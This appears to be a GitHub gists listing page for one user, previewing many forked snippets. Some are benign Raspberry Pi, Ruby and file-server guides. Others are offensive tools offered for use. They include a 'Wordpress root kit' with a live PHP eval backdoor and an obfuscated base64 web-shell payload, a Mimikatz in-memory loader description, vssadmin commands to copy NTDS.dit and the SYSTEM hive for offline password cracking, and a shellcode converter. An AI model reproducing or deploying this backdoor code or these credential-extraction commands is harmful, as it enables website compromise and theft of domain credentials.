Skip to content

Instantly share code, notes, and snippets.

View iamtutu's full-sized avatar

iamtutu iamtutu

27 followers · 99 following
View GitHub Profile
@iamtutu
iamtutu / gist:427e0f46d0de75fda02e98fb2bb66225
Created July 21, 2016 12:31 — forked from scmx/upgrade-install-ruby-2-1-2-ubuntu-12-04.md
Upgrade/Install ruby 2.1.2 #ubuntu #12.04 #14.04
# Reference http://stackoverflow.com/a/18490935/2037928
# Login as root
# Install needed packages
apt-get -y install build-essential zlib1g-dev libssl-dev libreadline6-dev libyaml-dev
cd /tmp
# Download appropriate ruby version https://www.ruby-lang.org/en/downloads/
@iamtutu
iamtutu / wordpressRootKit
Created August 10, 2016 06:23 — forked from jdeagle/wordpressRootKit
Wordpress root kit
// Injected VIA
<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>
<?php
$ref = $_SERVER['HTTP_USER_AGENT'];
$keywordsRegex = "/AtOPvMzpDosdPDlkm3ZmPzxoP/i";
if (preg_match($keywordsRegex, $ref)) {
$a='bas'.'e6'.'4_d'.'ecode';eval($a("QGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7DQpAaW5pX3NldCgnbG9nX2Vycm9ycycsMCk7DQpA
aW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsNCkBzZXRfdGltZV9saW1pdCgwKTsNCkBz
ZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7DQpAZGVmaW5lKCdXU09fVkVSU0lPTicsICcyLjUn
KTsNCg0KaWYoZ2V0X21hZ2ljX3F1b3Rlc19ncGMoKSkgew0KCWZ1bmN0aW9uIFdTT3N0cmlwc2xh
@iamtutu
iamtutu / netkatz.cs
Created August 12, 2016 11:57
Downloads and Executes Mimikatz In Memory From GitHub
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@iamtutu
iamtutu / AD domain offline cracking #pentest
Created October 13, 2016 18:25 — forked from ddouhine/AD domain offline cracking #pentest
Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.
Extract NTDS/SYSTEM from a domain controller:
net start vss
vssadmin create shadow /for=c:
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
@iamtutu
iamtutu / HowToOTGFast.md
Created November 29, 2016 08:54 — forked from gbaman/HowToOTGFast.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!

###Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)
More details - http://blog.gbaman.info/?p=791

For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.
3. Finally, open up the cmdline.txt. Be careful with this file, it is very picky with its formatting! Each parameter is seperated by a single

@iamtutu
iamtutu / HowToOTG.md
Created November 29, 2016 08:54 — forked from gbaman/HowToOTG.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero

Raspberry Pi Zero OTG Mode

Simple guide for setting up OTG modes on the Raspberry Pi Zero - By Andrew Mulholland (gbaman).

The Raspberry Pi Zero (and model A and A+) support USB On The Go, given the processor is connected directly to the USB port, unlike on the B, B+ or Pi 2 B, which goes via a USB hub.
Because of this, if setup to, the Pi can act as a USB slave instead, providing virtual serial (a terminal), virtual ethernet, virtual mass storage device (pendrive) or even other virtual devices like HID, MIDI, or act as a virtual webcam!
It is important to note that, although the model A and A+ can support being a USB slave, they are missing the ID pin (is tied to ground internally) so are unable to dynamically switch between USB master/slave mode. As such, they default to USB master mode. There is no easy way to change this right now.
It is also important to note, that a USB to UART serial adapter is not needed for any of these guides, as may be documented elsewhere across the int

@iamtutu
iamtutu / bin2sc.py
Created May 10, 2017 18:22 — forked from superkojiman/bin2sc.py
Convert bin to shellcode.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) < 2:
print "usage: %s file.bin\n" % (sys.argv[0],)
sys.exit(0)
shellcode = "\""
ctr = 1
maxlen = 15
@iamtutu
iamtutu / ftpserver.py
Created July 4, 2017 10:50 — forked from scturtle/ftpserver.py
simple ftp server by python
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
#import traceback
allow_delete = False
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 8888
currdir=os.path.abspath('.')
@iamtutu
iamtutu / web-servers.md
Created July 4, 2017 11:48 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@iamtutu
iamtutu / exploit.php
Created August 5, 2017 16:28 — forked from MKorostoff/exploit.php
<?php
/**
* @author Matt Korostoff <mkorostoff@gmail.com>
*
* @copyright Licensed under the GNU General Public License as published by the Free
* Software Foundation, either version 3 of the License, or (at your option)
* any later version. http://www.gnu.org/licenses/
*
* @usage php path/to/this/file.php 'http://example.com'
*/